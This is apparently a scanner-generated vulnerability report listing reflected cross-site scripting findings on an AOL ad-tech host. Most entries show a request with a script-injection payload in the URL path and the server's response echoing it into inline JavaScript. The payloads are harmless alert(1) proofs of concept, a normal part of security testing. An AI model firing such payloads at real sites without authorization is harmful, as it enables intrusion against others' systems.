HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:49:14 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:49:15 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13722 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... _265=s_gi('aolamn,aolsvc' s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/nai55e12"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main" ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.glb.adtechus |
Path: | /nai/daa.php |
GET /nai/daa.php194e1"><script>alert(1)< Host: nai.glb.adtechus.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JEB2=NOID; OptOut=we will not set any more cookies |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:49:27 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:49:27 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13792 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://nai.glb ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.glb.adtechus |
Path: | /nai/daa.php |
GET /nai/daa.php7f0ce"-alert(1)- Host: nai.glb.adtechus.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JEB2=NOID; OptOut=we will not set any more cookies |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:49:32 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:49:32 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13718 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... i('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/nai/daa.php7f0ce"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265. ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.glb.adtechus |
Path: | /sites/all/modules/cck |
GET /sites7cbaa"-alert(1)- Host: nai.glb.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://nai.glb.adtechus Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:38:47 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:38:47 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13570 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... 65=s_gi('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/sites7cbaa"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.lin ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.glb.adtechus |
Path: | /sites/all/modules/cck |
GET /sites33df0"><script>alert(1)< Host: nai.glb.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://nai.glb.adtechus Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:38:38 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:38:38 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13640 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://nai.glb ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.glb.adtechus |
Path: | /sites/all/modules/cck |
GET /sitesf6e31"-alert(1)- Host: nai.glb.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://nai.glb.adtechus Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:37:10 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:37:10 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13534 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... 65=s_gi('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/sitesf6e31"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternal ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.glb.adtechus |
Path: | /sites/all/modules/cck |
GET /sites46e31"><script>alert(1)< Host: nai.glb.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://nai.glb.adtechus Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:37:06 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:37:06 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13604 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://nai.glb ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.glb.adtechus |
Path: | /sites/all/modules/cck |
GET /sites/alle7cba"-alert(1)- Host: nai.glb.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://nai.glb.adtechus Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:38:01 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:38:01 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13534 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... _gi('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/sites/alle7cba"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilt ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.glb.adtechus |
Path: | /sites/all/modules/cck |
GET /sites/all27daf"><script>alert(1)< Host: nai.glb.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://nai.glb.adtechus Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:37:54 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:37:54 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13604 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://nai.glb ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.glb.adtechus |
Path: | /sites/all/modules |
GET /sitesad2a3"><script>alert(1)< Host: nai.glb.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://nai.glb.adtechus Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:37:11 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:37:11 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13584 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://nai.glb ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.glb.adtechus |
Path: | /sites/all/modules |
GET /sitescecfe"-alert(1)- Host: nai.glb.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://nai.glb.adtechus Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:37:15 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:37:15 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13514 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... 65=s_gi('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/sitescecfe"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilte ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.glb.adtechus |
Path: | /sites/all/modules |
GET /sites/all2f53d"-alert(1)- Host: nai.glb.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://nai.glb.adtechus Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:38:11 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:38:11 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13514 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... _gi('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/sites/all2f53d"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.glb.adtechus |
Path: | /sites/all/modules |
GET /sites/alld031f"><script>alert(1)< Host: nai.glb.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://nai.glb.adtechus Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:38:05 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:38:05 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13584 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://nai.glb ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.glb.adtechus |
Path: | /sites/all/modules |
GET /sites8956f"-alert(1)- Host: nai.glb.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://nai.glb.adtechus Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:37:50 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:37:50 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13514 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... 65=s_gi('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/sites8956f"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilte ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.glb.adtechus |
Path: | /sites/all/modules |
GET /sitesd86fc"><script>alert(1)< Host: nai.glb.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://nai.glb.adtechus Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:37:42 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:37:42 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13584 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://nai.glb ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.glb.adtechus |
Path: | /sites/all/modules/views |
GET /sitesac7a0"><script>alert(1)< Host: nai.glb.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://nai.glb.adtechus Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:37:58 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:37:59 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13568 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://nai.glb ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.glb.adtechus |
Path: | /sites/all/modules/views |
GET /sites89ce3"-alert(1)- Host: nai.glb.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://nai.glb.adtechus Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:38:08 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:38:08 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13498 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... 65=s_gi('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/sites89ce3"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.glb.adtechus |
Path: | /sites/all/modules/views |
GET /sites1014a"-alert(1)- Host: nai.glb.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://nai.glb.adtechus Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:38:11 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:38:11 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13706 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... 65=s_gi('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/sites1014a"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.glb.adtechus |
Path: | /sites/all/modules/views |
GET /sites92ba8"><script>alert(1)< Host: nai.glb.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://nai.glb.adtechus Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:38:02 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:38:02 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13776 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://nai.glb ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.glb.adtechus |
Path: | /sites/all/themes/zen |
GET /sites58d7f"><script>alert(1)< Host: nai.glb.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://nai.glb.adtechus Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:36:33 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:36:33 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13584 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://nai.glb ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.glb.adtechus |
Path: | /sites/all/themes/zen |
GET /sitesbb72e"-alert(1)- Host: nai.glb.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://nai.glb.adtechus Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1 |
